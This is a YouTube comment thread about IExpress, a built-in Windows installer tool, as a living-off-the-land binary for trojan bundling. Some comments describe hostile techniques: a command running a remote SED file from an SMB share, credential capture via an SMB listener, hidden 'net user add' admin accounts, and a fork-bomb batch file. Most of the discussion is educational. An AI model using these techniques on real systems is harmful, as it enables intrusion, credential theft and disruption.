Reminds me of doing naughty things with winrar back in the day. You could create a winrar executable that would function like a normal zip file but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.
Still being used till today
I used to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out about WPF applications on web pages to bypass security. Not as easy as it used to be with IE but still there. Also use an MSI file with resilience to re-download when the file is removed. Old as time, but works even today.
With this I think I'm not just "living off the land", your computer is my Dukedom
"open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching UA-cam tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!
literally never heard of it, great video.
wow, you must have had a sad childhood if you never went to play in system32
@nyandesu9165 lol not really no, i had an iMac as a kid, not a Windows. i've just never read about this particular binary. i'll usually look at windir for DLL sideloading and stuff by checking missing DLLs in procmon or wtv. haven't explored a lot of lolbins. :D
How do people even find this stuff! As an addicted learner of this genre of IT, this is gold!
When you were running the .exe files, I assumed you were in an Admin role. I am curious what would display on the UAC prompt for a non-Admin role?
Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people?
Also, I was not sure where the connection to Internet Explorer came from in the Sigcheck details?
Finally the 40+ min. videos are back. I missed them. I would love more stuff like the 'Throwback Network' videos. And no offence, but the 10-15 min. videos with 3 min. advertisements in the middle got kinda boring over time. Lov ya, take care.❤
What an outro 😂 with the loop of calc
This is golden info😊
Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)
Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?
this thing basically just zips your files and ships them as an exe. literally any antivirus would detect it and see right through it, and only skids would use it.
Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, as discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either set up other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on. And you are right that it can be extra obfuscation for deeper layers of malware just as well; it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not its generated EXE... and there is nothing stopping you from providing the file with a remote location by an SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share\remote.SED), so it doesn't need to be on disk or depend on another file artifact.
@_JohnHammond Just tried it from the same folder, yeah that works. Thanks for the explanation, yeah that all makes sense. Fascinating
You have my attention for the rest of my life
I ❤ living in QUANTUM time, thanks to Microsoft (and John & the researchers)
Rebuilding Installer.exe from Installer.SED - Can the other way around be done too?
Just curious
This is some very good information, mister
Is this a way to make an auto executing USB ?
This is mental, I will never trust an exe ever again 🤣 Thank goodness I use Linux as a daily OS
Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy-nilly is bad no matter the OS. The strongest antivirus is a smart user, but even they aren't infallible.
linux isn't immune to viruses. also you don't need to mention that you use linux everywhere
Yo mate, one of my machines just got hacked.
Other than Twitter, how can I send you the logs and artifacts?
It might be worth looking into, since you're into that stuff.
Nevermind. This video has what your site doesn't: the full list of links 😂
can it bypass AV by first putting an exclusion on the C:\ drive, then executing a PowerShell base64 in-memory ransomware?
no
Give up kid
This made me laugh out loud, Ty kid
it doesn't really work like that 😅
this fixes a problem which is not there, you understand? there are 1000s of ways of bundling your software, but like some other comments said: the AVs can see right thru it (which is logical because it's not obfuscated...
Love the early morning uploads! At least in California
I wonder if u can prompt a user to run it with admin privilege
you can, just like you can with any exe
@yukiqt yeah but the installer doesn't specifically ask for admin privilege
@k4m1kazep1lot4 if you're asking if it can bypass UAC, it can't
you can put the command in the GUI too, it's not stopping you (13:05)
After I saw you can automate it, without any windows: definitely should be on the list !
Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :)
BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!
wtf John, stop please, you're makin' me really anxious about everything connected to the internet. :D
maybe run net user add commands in the secondary options? hefty way to have sneaked-in local admin accounts?
Would antivirus catch the iexpress instance though? Like when you first call iexpress, would antivirus throw a warning?
Probably not, as it’s built in on Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.
I wonder how to block that as part of Windows PC hardening🤔🤔🤔???
Gosh, this is like those WinRAR or WinZip self-extracting zip or rar files, where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software or this).
Or that stuff like NSIS or InstallShield that I also used a bit
0:13 that's what they want you to think
very good information
I would like to see this with metasploit in action but yt will not allow it right
youtube would allow it, it just wouldn't be very interesting
i mean you can use whatever you want for CnC lol, i'd rather use something that won't get flagged in memory or wtv like a dotnet agent, then use a beacon or meterpreter for advanced control after i have persistence
Sir, Would you make videos about scammers please 🙏
@romanemul1 Did I ask you? Or are you a scammer?
hang on, you started a bomb on your actual computer instead of a virtual machine?
you're living on the edge here!
28:05 Tags, also known as "greater than less than symbol waka waka alligator faces" 🐊🐊
it seems like a great tool to keep in the windows install... if you are the NSA 😲
Bro help bro i have doubt im kiddo
iexpress as a trojan is like the old comics where the CIA use old Soviet gear to perform surveillance, the old Soviet gear being giant satellite dishes with giant headphones and antennas.
Not really living off the land when I have to then social engineer someone to install the file or run it from within a service i've already exploited. better ways to get this done, nice way to make an installer though i guess...
hm,that might be a problem
I can't try it out because my pc doesn't run windows
poor little linux user
Runs in WINE on linux.
@_Yassir_ in the words of OTW, "if you don't know Linux, you're not a hacker."
@not_user11 I use Windows stuff like this all the time. Pretty much anything old, or CLI, will run with WINE. Hell, I'd say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.
Cheers.
Definitely. After watching the video, certainly! :D
honestly this only feels useful for a script kiddy kind of thing because all of this is already trivial for actual developers, e.g. via costura
Damn it John. Stop burning my unknown lolbins!
Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!
Go easy on the shift key bud. 😂
The duke of windows nuking
100 percent of kids would do this on every pc in schools back in my day looooool if only we had youtube haha
You can right click on an exe and choose extract.
From the 3 below, which one is efficient
AWUS036ACM
AWUS036ACH
AWUS036NHA
According to you?
Using this "SED" technique. lol
The wikipedia page on this is interesting. But I am trying to figure out - why does it exist? But yes, it belongs in the lolbin category.
Sup
oh jeez, ofc thats a lolbin
Windows defender instantly detected my test file lol
Hey, can someone give me an idea of what I should price my mobile app at?? Main purpose/function is to be able to hash files and verify files on mobile. Already made it and it works well, just don't know what to price it at, was thinking £2? Don't want to open source it, got bills to pay, any advice or ideas are welcome
@seancrouch why can't I do that on my PC? My phone is basically for calling and texting people and sometimes watching UA-cam/surfing the web. If I were going to use my phone like a computer, I'd just install a Linux distro on it and have everything I could ever want for free.
Hi
Bypass antivirus with iexplorer, encode payload in opera example
IExpress is something the RAT kiddies used to love using to pack up the nasty RATs. Not seen this in time, surprised it's not in the LOTL files.
yikes
Bro who you yelling at tho
He's just passionate about the subject. He doesn't yell half as much as some youtubers do.
@Cyba_IT I'm just trying to stay chill and learn about IT, not have lunch with Samuel L Jackson 😆😆😆
@looweegee252 😂😂😂
for "hackers", specifically the skids lmao
Well said 😂
well, lolbins aren't really only used by skiddies, several bigger threats have been using lolbins like certutil or installutil.
@88tx well, guess any good pen tester would use anything at their disposal even if it's easy, no reason to work twice the amount for the same outcome 🙂
I have seen sth like that with .bat
Why would it be used specifically by script kids?
People like you seem to think real hackers are only using their own zero-days written in assembly and they're connecting to the internet by using hacked Norwegian satellites etc... lol
41 minutes of yapping just to tell us that an installer can run whatever you tell it to.
You may be right about that but remember, you aren't entitled to anything and he doesn't owe us anything.
don't be a dick bud
he literally jumped right in and explained what the tool was
@MygenteTV 🤓
@HyBlock spoken like someone who doesn't understand how lolbin attacks work
basically first
first
First 🥇
second
don't worry, soon microsoft will get rid of all the old ~[control-panel] and other vintage [features] and stuff in windows, so u don't mess around :D
Update: they are not getting rid of it
Yup just like those .pif files too.
bro
lol classic
tfw no secret end-of-video keyword 😞
Bb
omg
First 😂
This is kind of stupid.
Any installer maker can do this, and there are many easier to use and abuse. It is not in the list because AN INSTALLER MAKER is known to be able to do this, it is not a design flaw or weakness.
This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.
@anik2443 it does not matter that it comes with Windows. Why would it?
It's not like YOU are making your own malware to infect yourself.
Any bad actor can use whatever, it doesn't have to be pre-installed. That is why it is stupid
@VaracolacidVesci do you know nothing about post exploitation? It's for remaining undetected by using tools available natively in the system. Go research it
@anik2443 hahahaha ofc not! You are trying to sound fancy but clearly you are just another asshole on the internet.
it's not like the AV engines or any other software would say OH it is made by the system tool, let's allow it!
hahaha how stupid can you be
@anik2443 hahahaha OFC NOT!
There is nothing special about it being on the system, it's not like the exe would have anything special about it. it's not like the AV engines or any other protection would say, OH it is made by the system tool, let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?
Bring game hacking *🎉❤
i remember pranking my friends with a .bat file (named hello.bat) containing:
start hello.bat
call hello.bat
very funny, unless you have unsaved work
(unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)
Instructions unclear. Typing does nothing on my Windows 95 computer's start menu.